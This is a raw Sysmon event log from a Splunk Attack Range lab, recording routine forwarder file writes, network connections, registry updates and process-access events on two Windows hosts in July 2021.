23542300x80000000000000001049417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:54.099{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E13DB7C632294D20F6AF4E73C0EEE5,SHA256=C7074C19EE233AEE810FB35C6164FCD300DB1FFDAB46291BE348B6B110AEE540,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:52.300{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57285-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:55.672{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A2381797403F8CA492F75A9032B4C94,SHA256=B946CA5839CCD692A3C73C664BE29BE9F603BADC8F3D1E86416673ECF27BCF39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:55.114{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE07CC8ADB8823401C524CE0957B28D5,SHA256=15C7C3B30FF365B6A0387B2AF9862AEC393E5C5A68439947BFC3035C9D43DF36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:56.719{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA67BFE7B7D25902671D23902DA222A,SHA256=E1888675AF26B3134C08841AC94984F594AF8D558F95ED10BCB14F6A4391518C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:56.133{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6627CEED8F47D5C8E71743F83855AA6,SHA256=D0B19BBBFBA2BDD7A29F91AA8C2F3068DE75D34B007B0BE08C88D28424EEA891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:57.734{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F88914C22411F1026685341DB6D750BA,SHA256=EBF1FA88FE2F913082DE8EF7DC20791D4677ED9F74CF6FF820E1B7BF1342200E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:49.817{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net30620-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:57.151{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26EF4993AFF2959421FE26E6DCE4347,SHA256=FFB8DAE6F46AB49E9799BE262E332B8528838D76662E75E42D2A83B4979CA314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:57.014{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:58.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E1DCD6ECB0C72337253FE0A5A0F86A9,SHA256=B22AAAD1E7BDF5D7DCC51E6738DFEEDA53297871354D1A9685BED6932E192079,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:57.304{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57286-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.540{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51049-false10.0.1.12-8089- 23542300x80000000000000001049425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:58.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=122DAF525B5FF128E70F7B50A65F2824,SHA256=1CAFE86FCA7B2F91320951EBC7DF4737398AEA93C87E66E9A7D4651658C595B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:58.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B076BCCCE6E146C06E97813F4895455,SHA256=C16581144110C89F5B8BC98060C7334D4783D2B0A1D65BBFD5F7137D490F19BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:59.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=600818A7DDC719B624146DB395DE4778,SHA256=4A850BF67F83A08995B1785B3103A5AF7803388A81DBD93BEFD7880B5BB70789,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001049437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001049436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6ae1db) 13241300x80000000000000001049435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xb09424fc) 13241300x80000000000000001049434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x12588cfc) 13241300x80000000000000001049433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x741cf4fc) 13241300x80000000000000001049432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001049431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6ae1db) 13241300x80000000000000001049430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xb09424fc) 13241300x80000000000000001049429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x12588cfc) 13241300x80000000000000001049428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x741cf4fc) 23542300x80000000000000001049427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:59.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67ADF5C47A4A827551D5B17901711B4A,SHA256=8E3D78DA5C461E9B58523083A7CA26D526E2BDD56C6D25F0A7BD9165F4B4C5CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4117584B0689AB6A4305AEAFC822FDD5,SHA256=5DFE4985E68D8A25FBA618A728D0312F7C61865462DB7D40FCDBE149B117A880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=074647A239F519326447456083E7D307,SHA256=5121C6F3CEEFDAFD74C546AC049DD66C1140BA95F82D7AA7217F9C78F01AE2C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.812{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71341299240D4E723F31D3B7BD57D460,SHA256=B0961FA277C087888E88E39099A220964CE6C5FD7575F43A0FA5F9DCE8539226,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:00.832{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075353MD5=CAB9EA099F8B65DA4AE125101D7328BE,SHA256=3E24E39A8813F2AC2140FD652407894FD0893262E99BBB6069BCAA3D59DC9B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:00.182{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF9223815139B93B2512B12245ECBE7,SHA256=5B13934346419A21CBCA6E7D28CF9C585E228E6F26256D3B51A3EC0EC5711CC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.638{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51050-false10.0.1.12-8000- 23542300x8000000000000000807868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:01.828{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=923E9F5EE463136501308D4AFCCC8B1F,SHA256=F0D2E7037AE362806F6ECA44BF00234F5D899EFCE3AA3A4B02FF117CD917C257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:01.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F3E419B67D0DEEF369FE1B4821AF95,SHA256=391CEA62044C5A1A0E16B651E782A22F082840AD9117C9A8F7A53E4F426F243D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:59.790{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-58305-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:02.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3045948F9DC41786F7E8E90E6515EC71,SHA256=D91B95116593641B5C509D63A31B648EF6540D0EA596DD2B869EC7A6FF30D61F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:02.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419306AB231343F293C0B0028626B93B,SHA256=5970A452CE965899B1D04467769666140D90B84BBBC8872081A2747BDE333502,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.100{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57287-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x80000000000000001049442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.492{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57287-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x8000000000000000807871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:03.859{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42FB247DECA32322B1A475412144855,SHA256=95A63018725DFA3323003DEAB629570556DA1FB20DEBF7B457D4B6F9CA039A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:03.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C3A92CFA0CF8F32CA63BF6EA2296617,SHA256=28580EACAC91C19F91B881FDFB751F179ED39F3F8C568F85B279087C1EBAA40B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:04.875{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBEF6C1E39898F8645FD260EE19944B4,SHA256=D5CC576FBB14EC689AC212B02CA8CC30BEEB26662A685853A31ADBD33F7CAA58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.281{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD5ED2ACAB292A97B0342D549F5D3E6B,SHA256=79A9561CE21927137530DADB69F0D9C43D3A6C3724A74DE0510E6A8A9C85360A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:03.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57288-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:05.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=407B05FA1846E4300849F09BCA9374F1,SHA256=AFBAA5E99593134E87BE5BB8BCB26AE3C832B72498CA55D2E9A1F18659AF83CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:05.312{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31EBF719F7958F7D956823BAF2F8AEAA,SHA256=DCFF1B4C041125090B7FEDD9AF2709BF983433E3F457B453ECA93BAE3CCB9380,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:56.768{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51051-false10.0.1.12-8000- 23542300x8000000000000000807875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:06.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B5B8124AAEB8FE5D2C7ABE4684FC90A,SHA256=22271B99D97DCAD0CBD5BBA8E08B7960A540C6464B86B777A0931583E1BE78CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.749{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.749{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.733{466BC892-32D3-60E8-770B-00000000CF01}63565180C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.733{466BC892-32D3-60E8-770B-00000000CF01}63565180C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 